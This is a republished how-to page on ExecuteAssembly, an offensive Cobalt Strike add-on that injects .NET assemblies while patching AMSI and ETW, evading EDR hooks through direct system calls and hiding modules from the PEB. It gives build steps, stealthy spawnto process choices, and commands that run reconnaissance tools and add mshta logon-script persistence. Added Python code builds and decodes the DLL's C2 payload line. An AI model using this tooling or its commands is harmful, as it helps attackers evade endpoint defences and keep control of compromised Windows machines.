2025-01-17 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article explains how to use ExecuteAssembly to load and inject .NET assemblies. The content is concise and should be easy to follow.
About ExecuteAssembly
ExecuteAssembly is an alternative to Cobalt Strike's execute-assembly module. It is written in C/C++ and helps researchers load and inject .NET assemblies. It reuses the spawnto host process to load the CLR modules and the AppDomainManager, stomps the PE DOS headers of the reflective loader and of the .NET assembly, and unlinks the .NET-related modules from the PEB; on top of that it carries ETW and AMSI bypasses. It can also get past user-mode EDR hooks by issuing static NT system calls, and it hides its imports by resolving Win32 APIs dynamically at runtime, matching export names by their SuperFastHash hash.
Feature overview
Unlinks the CLR-related modules from the PEB data structures
Stomps the PE DOS headers of the .NET assembly and of the reflective DLL
Bypasses EDR hooks using static, hard-coded system calls
Enumerates and reuses existing CLR AppDomains / AppDomainManagers
Resolves Win32 APIs dynamically by API name hash
Patches AMSI and ETW after the .NET assembly is loaded
Parses the .NET assembly bytes to detect which CLR version must be loaded
Implements the ETW bypass without calling GetProcAddress/LoadLibrary/GetModuleHandle
Hosts the CLR through the v4 COM hosting API and reflective DLL injection
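The feature list says the loader parses the assembly bytes to decide which CLR to start. The added example below (written for this page, not code from the ExecuteAssembly project) shows the one reliable way to do that from raw bytes without loading anything: locate the CLR metadata root by its "BSJB" signature and read the runtime version string stored there (ECMA-335 II.24.2.1), then map it to the runtime name the v4 hosting API expects. Whether ExecuteAssembly scans exactly this way is an assumption; the header layout, the signature value and the version strings "v2.0.50727" / "v4.0.30319" are standard. The sample input is constructed inline, not a real assembly.

```python
import struct
from typing import Optional

# "BSJB" read as a little-endian DWORD: the signature of the CLR metadata root
# (ECMA-335 II.24.2.1). Every managed PE carries exactly one such root.
METADATA_SIGNATURE = 0x424A5342


def find_clr_version(assembly: bytes) -> Optional[str]:
    """Scan raw assembly bytes for the metadata root and return its runtime
    version string (e.g. "v4.0.30319"), or None if no plausible root is found.

    Metadata root layout:
      +0   Signature    DWORD  0x424A5342
      +4   MajorVersion WORD   1
      +6   MinorVersion WORD   1
      +8   Reserved     DWORD  0
      +12  Length       DWORD  bytes reserved for the version string (4-aligned)
      +16  Version      UTF-8, NUL-terminated, padded with NULs to Length
    """
    sig = struct.pack("<I", METADATA_SIGNATURE)
    pos = assembly.find(sig)
    while pos != -1:
        if pos + 16 <= len(assembly):
            major, minor, reserved, length = struct.unpack_from("<HHII", assembly, pos + 4)
            # A stray "BSJB" inside strings or data would otherwise be read as a
            # header, so insist on the fixed field values before trusting it.
            if (major, minor, reserved) == (1, 1, 0) and 0 < length <= 256 \
                    and pos + 16 + length <= len(assembly):
                raw = assembly[pos + 16:pos + 16 + length]
                version = raw.split(b"\x00", 1)[0].decode("utf-8", errors="replace")
                if version.startswith("v"):
                    return version
        pos = assembly.find(sig, pos + 1)
    return None


def runtime_to_request(version: str) -> str:
    """Map the metadata version string to the runtime name a host passes to the
    v4 hosting API (ICLRMetaHost::GetRuntime). Assemblies built for .NET 2.0,
    3.0 and 3.5 all carry "v2.0.50727" and run on the v2 CLR; 4.x carries
    "v4.0.30319". Anything else is refused rather than guessed."""
    if version.startswith("v4."):
        return "v4.0.30319"
    if version.startswith("v2."):
        return "v2.0.50727"
    raise ValueError(f"unsupported CLR version string: {version!r}")


def build_metadata_root(version: str) -> bytes:
    """Constructed test input: a metadata root with the given version string and
    an empty stream directory, laid out as in ECMA-335 II.24.2.1."""
    vbytes = version.encode("utf-8") + b"\x00"
    length = (len(vbytes) + 3) & ~3
    return (struct.pack("<IHHII", METADATA_SIGNATURE, 1, 1, 0, length)
            + vbytes.ljust(length, b"\x00")
            + struct.pack("<HH", 0, 0))  # Flags, Streams


if __name__ == "__main__":
    # Constructed sample: a fake PE prefix, a decoy "BSJB" inside string data,
    # then the real metadata root.
    sample = (b"MZ" + b"\x00" * 62 + b"...BSJB..."
              + build_metadata_root("v4.0.30319") + b"\x00" * 16)
    found = find_clr_version(sample)
    print(found, "->", runtime_to_request(found))
```

The sanity check on the fixed header fields matters in practice: "BSJB" is a common enough byte sequence in packed or embedded data that a naive signature scan will occasionally land on the wrong offset and hand the host a garbage version string.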
Tool download
Clone the project source locally with:
git clone https://github.com/med0x2e/ExecuteAssembly.git
x64 (syscalls): this build relies on static system calls to bypass EDR hooks; use it to build the x64 DLL (only x64 is supported).
x86 | x64 (PEB): resolves the required API addresses at runtime by walking the modules linked in the PEB and their export address tables (EAT), matching exports by SuperFastHash hash. This does not account for EDR hooks placed inside kernel32.dll or ntdll.dll itself. Use this version to build both the x86 and x64 DLLs, or build only the x86 DLL here and take the x64 DLL from the x64 (syscalls) version to deal with common EDR hooks.
Build the DLLs with VS2017 or Windows SDK 10.0.17134.0 (or a compatible SDK version).
Make sure gzip is installed, place the following files in the same directory, and load the script "ExecuteAssembly.cna":
ExecuteAssembly.cna
ExecuteAssembly-x64.dll
ExecuteAssembly-x86.dll
Command line options
--dotnetassembly: .NET assembly to load/inject.
--assemblyargs: .NET assembly arguments.
--unlink-modules: Unlink .NET related modules such as CLR/MsCoree related DLLs from the PEB data structures.
--stomp-headers: Stomp the .NET assembly and reflective DLL PE DOS headers.
--etw: Bypass Event Tracing for Windows (ETW).
--amsi: Bypass AMSI.
--spawnto: Choose the spawnto process.
List of .NET binaries that load the CLR by default when executed:
- PresentationHost.exe
- stordiag.exe
- ScriptRunner.exe
- caitstatic.exe
- Microsoft.Uev.SyncController.exe
- TsWpfWrp.exe
- UevAgentPolicyGenerator.exe
- UevAppMonitor.exe
- FileHistory.exe
- UevTemplateBaselineGenerator.exe
- UevTemplateConfigItemGenerator.exe
Since these binaries load the CLR by default, pick one of them as spawnto and avoid the well-known LOLBins.
Usage examples
ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --assemblyargs LogonSessions --unlink-modules --stomp-headers --amsi --etw --spawnto PresentationHost.exe
ExecuteAssembly --amsi --etw --unlink-modules --stomp-headers --dotnetassembly /tmp/ghostpack/SharPersist.exe --assemblyargs -t reg -c "C:\Windows\SysWow64\mshta.exe C:\Users\admin\Downloads\Test2.hta" -k logonscript -m add --spawnto FileHistory.exe
ExecuteAssembly --unlink-modules --stomp-headers --dotnetassembly /tmp/ghostpack/SharPersist.exe --assemblyargs -t reg -k "logonscript" -v "C:\Windows\SysWow64\mshta.exe C:\Users\admin\Downloads\Test.hta" -m remove --spawnto FileHistory.exe
ExecuteAssembly --unlink-modules --amsi --dotnetassembly /tmp/ghostpack/SharpWMI.exe --assemblyargs action=query computername=localhost query="select * from win32_service" --spawnto FileHistory.exe
ExecuteAssembly --amsi --etw --dotnetassembly /tmp/ghostpack/SharpWMI.exe --assemblyargs action=query query="select * from win32_process" --spawnto PresentationHost.exe
C2 support
This feature was written to support and test Cobalt Strike, but it can also be used with other C2 frameworks (such as MSF). Keep in mind that the reflective DLL's DllMain expects a single-line payload as its parameter, in the following format:
AMSI_FLAG | ETW_FLAG | STOMPHEADERS_FLAG | UNLINKMODULES_FLAG | LL_FLAG.LENGTH_FLAG.B64_ENCODED_COMPRESSED_PAYLOAD [SPACE SEPARATED ARGUMENTS]
AMSI_FLAG: 0 or 1
ETW_FLAG: 0 or 1
STOMPHEADERS_FLAG: 0 or 1
UNLINKMODULES_FLAG: 0 or 1
LENGTH_FLAG: .NET assembly size in bytes
LL_FLAG: the number of characters in LENGTH_FLAG
B64_ENCODED_COMPRESSED_PAYLOAD: the .NET assembly, gzip-compressed and Base64-encoded
[SPACE SEPARATED ARGUMENTS]: .NET assembly arguments
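If you want to drive the DLL from a C2 other than Cobalt Strike, something has to build this line on the operator side, and the DLL has to take it apart again on the target. The added example below (Python written for this page; not the project's .cna script or its C++ parser) does both ends for the layout given above, so the two can be checked against each other. It follows the separators exactly as the format line shows them; that the real DllMain parses the line identically, and how it tokenises the trailing arguments, is an assumption. The assembly bytes are a constructed stand-in, not a real .NET binary.

```python
import base64
import gzip
from typing import Any, Dict


def build_payload(assembly: bytes, args: str = "", amsi: bool = True, etw: bool = True,
                  stomp_headers: bool = True, unlink_modules: bool = True) -> str:
    """Serialize one assembly plus its options into the single-line layout:
    AMSI|ETW|STOMP|UNLINK|LL.LENGTH.B64(gzip(assembly)) [args]"""
    length_field = str(len(assembly))        # LENGTH_FLAG: raw (uncompressed) size
    ll_field = str(len(length_field))        # LL_FLAG: how many digits LENGTH_FLAG has
    flags = "|".join("1" if f else "0" for f in (amsi, etw, stomp_headers, unlink_modules))
    b64 = base64.b64encode(gzip.compress(assembly)).decode("ascii")
    line = f"{flags}|{ll_field}.{length_field}.{b64}"
    return f"{line} {args}" if args else line


def parse_payload(line: str) -> Dict[str, Any]:
    """Decode a payload line back into flags, assembly bytes and argument string,
    as the DLL side must. Raises ValueError on a malformed line or when the
    decompressed size does not match LENGTH_FLAG."""
    head, _, args = line.partition(" ")     # arguments start at the first space
    parts = head.split("|")
    if len(parts) != 5:
        raise ValueError("expected 4 flags and one payload section")
    flags: Dict[str, Any] = {}
    for name, value in zip(("amsi", "etw", "stomp_headers", "unlink_modules"), parts[:4]):
        if value not in ("0", "1"):
            raise ValueError(f"flag {name} must be 0 or 1, got {value!r}")
        flags[name] = value == "1"
    ll_field, sep, rest = parts[4].partition(".")
    if not sep or not ll_field.isdigit():
        raise ValueError("missing LL_FLAG")
    ll = int(ll_field)
    # LL_FLAG fixes how many characters of LENGTH_FLAG to read; the "." after
    # them must be there, otherwise the Base64 section would be misaligned.
    length_field = rest[:ll]
    if len(length_field) != ll or not length_field.isdigit() or rest[ll:ll + 1] != ".":
        raise ValueError("LENGTH_FLAG does not match LL_FLAG")
    expected = int(length_field)
    assembly = gzip.decompress(base64.b64decode(rest[ll + 1:], validate=True))
    if len(assembly) != expected:
        raise ValueError(f"decompressed {len(assembly)} bytes, header says {expected}")
    return {**flags, "assembly": assembly, "args": args}


def payload_is_valid(line: str) -> bool:
    """True if the line parses cleanly and its size field matches the contents."""
    try:
        parse_payload(line)
        return True
    except (ValueError, OSError):   # OSError: gzip.decompress on corrupt data
        return False


if __name__ == "__main__":
    # Constructed stand-in for an assembly: an "MZ" prefix and some filler bytes.
    fake_assembly = b"MZ" + bytes(range(256)) * 4
    line = build_payload(fake_assembly, "LogonSessions", etw=False)
    print(line[:40] + "...")
    decoded = parse_payload(line)
    print(decoded["amsi"], decoded["etw"], len(decoded["assembly"]), decoded["args"])
```

The size check after decompression is the part worth keeping on the DLL side: a truncated or corrupted line that still Base64-decodes will otherwise be handed to the CLR as an assembly, and the failure shows up much later and much less clearly.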
That covers how to use ExecuteAssembly to load and inject .NET assemblies; the specifics still need to be verified in practice.